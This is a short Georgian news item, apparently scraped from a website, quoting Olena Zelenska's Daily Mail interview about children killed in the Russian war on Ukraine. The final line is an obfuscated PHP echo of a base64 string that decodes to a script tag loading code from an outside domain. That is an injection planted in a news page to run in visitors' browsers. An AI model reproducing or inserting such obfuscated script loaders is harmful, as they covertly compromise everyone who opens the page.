celsiusi
ავერსი საქკაბელი
უკრაინის პირველმა ლედიმ ოლენა ზელენსკამ ბრიტანული გაზეთის, Daily Mail-ისთან საუბრისას განაცხადა, რომ "მკვდარი" და "ბავშვები" - ეს ორი სიტყვა გვერდიგვერდ წარმოუდგენელია. 
 
მისივე თქმით, რომ კითხოთ ნებისმიერ დედას, რა არის მისთვის ყველაზე ძვირფასი მსოფლიოში, პასუხი იქნება – შვილები.
 
„ეს საშინელი ომი ბავშვებისთვის სიკვდილს ნიშნავს. ამ ბოლო დროს მკითხეს, ომის დროს ვტიროდი თუ არა. ვტირი ასე. როცა ვხედავ, მაგალითად, ჩვეულებრივი საცხოვრებელი კომპლექსის ეზოში საფლავს. მასზე ხელნაკეთი დაფა: "დედა... შვილი..." და აჩუქე სიცოცხლე. ასე ასაფლავებენ მეზობლები მიცვალებულებს მუდმივი დაბომბვის ქვეშ ჩვენს ქალაქებში - მარიუპოლში, ბუჩაში, გოსტომელში.
 
ომის დაწყებისას რუს დედებს ვკითხე, რას გრძნობდნენ, როცა მათმა შვილებმა ჩვენი შვილები დახოცეს. მაგრამ აქამდე მე მესმოდა მხოლოდ გამაყრუებელი სიჩუმე რუსი დედებისგან. დაშინებულები არიან თუ გულგრილები? წარმოდგენაც არ მინდა, რადგან არ ვიცი რომელია უარესი",- ამბობს ოლენა ზელენსკა.
 
796
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");